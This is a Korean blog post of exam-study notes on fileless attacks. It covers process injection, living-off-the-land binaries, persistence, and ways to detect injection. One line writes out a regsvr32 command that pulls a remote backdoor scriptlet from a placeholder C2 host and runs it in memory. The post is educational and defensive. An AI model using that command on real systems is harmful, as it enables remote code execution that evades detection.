1. 파일리스 공격의 등장 배경
- 이전에 발생했던 공격같은 경우, 공격자는 디스크에 writing, 파일 생성 등을 하게 됨
→ 악성코드 분석가 등에 의해 모니터링 및 파일이 탐지될 가능성이 높음
→ 파일 탐지 기준이 명확함 (exe, dll 등 실행 파일 내에는 올바른 키 값, 인증서 정보 등이 들어가게 되는데, 의심스러운 파일 내에는 이런 정보가 없음)
2. 파일리스 공격이란?
- 실행되는 코드가 파일로 생성되지 않고 메모리에만 존재하며, 흔적을 남기지 않는 유형의 공격
- 특징
① 프로세스 인젝션 기술 사용 : 정상적인 다른 프로세스에 공격자가 악성 코드나 라이브러리 등을 로딩시켜서 정상적인 프로세스의 메모리 공간 안에서만 실행이 되도록 함 → 안티바이러스 프로그램의 탐지가 어려워짐
② LoL 바이너리 사용 : 하기 참고
③ 스크립팅
④ Fileless persistence : persistence는 MITRE ATT&CK의 전술 중 하나로, 시스템이 재부팅 될 때 혹은 주기적으로 공격이 실행되도록 하는 것
LoL (Living Off the Land) 이란?
- 자연에서 얻을 수 있는 것들을 활용
- 새로운 악성코드, 파일 등이 아닌 원래의 것을 활용
- LoL Binaries (LoL Bins) : 대부분의 시스템에 설치되어 있으며, 별도의 수정없이 공격에 바로 사용할 수 있는 기능을 가진 정상적인 실행 파일
3. 파일리스 공격 예시
1) regsvr32 사용
(* regsvr32 : dll 파일을 실행하는 빌트인 명령어, 악의적인 행위 수행 X)
- regsvr32 /s /n /u /i : http://C2/backdoor.sct scrobj.dll(빌트인 파일)
scrobj.dll 을 regsvr32가 실행하는데, 인자값으로 인터넷상에있는 backdoor.sct 를 메모리에 로딩(디스크 터치X)
2) 프로세스 인젝션 기술
* 프로세스 인젝션 : 프로세스가 다른 프로세스 메모리 공간에 악성 dll이나 코드를 주입해서 실행시키는 것
예를 들어, 윈도우에서는 explorer.exe 프로세스는 PC 실행 시~종료까지 살아있는 프로세스임
이때 다른 프로세스가 explorer.exe에 악성 코드를 주입시켜놓고 본인은 죽어버림
- 프로세스 인젝션 탐지 방법
. 운영체제의 파일시스템 내에서 ADS(Alternate Data Stream)을 분석하여 인젝션된 코드나 라이브러리의 흔적 찾기
. 운영체제 라이브 아티팩트 중 네트워크 활동정보(EX. 컨넥션된 IP/도메인 등)와 관련된 프로세스의 목록을 매핑하여 인젝션된 데이터의 흔적을 찾기
. 프로세스 인젝션에 빈번하게 사용하는 API를 실시간 모니터링
'정보보안 > 보안공부' 카테고리의 다른 글
18회 정보보안기사 실기 시험 문제 복기 (1) | 2021.10.30 |
---|---|
OECD 프라이버시 보호 8원칙 (0) | 2021.10.25 |
OWASP TOP10 2021 (한글) - 빈칸문제 드래그 (0) | 2021.10.24 |
위험관리 / 위험분석(정량적&정성적 방법) 총정리 - 빈칸문제 (0) | 2021.10.16 |
MITRE ATT&CK 프레임워크 정리 (정보보안기사 기출) (0) | 2021.10.15 |
댓글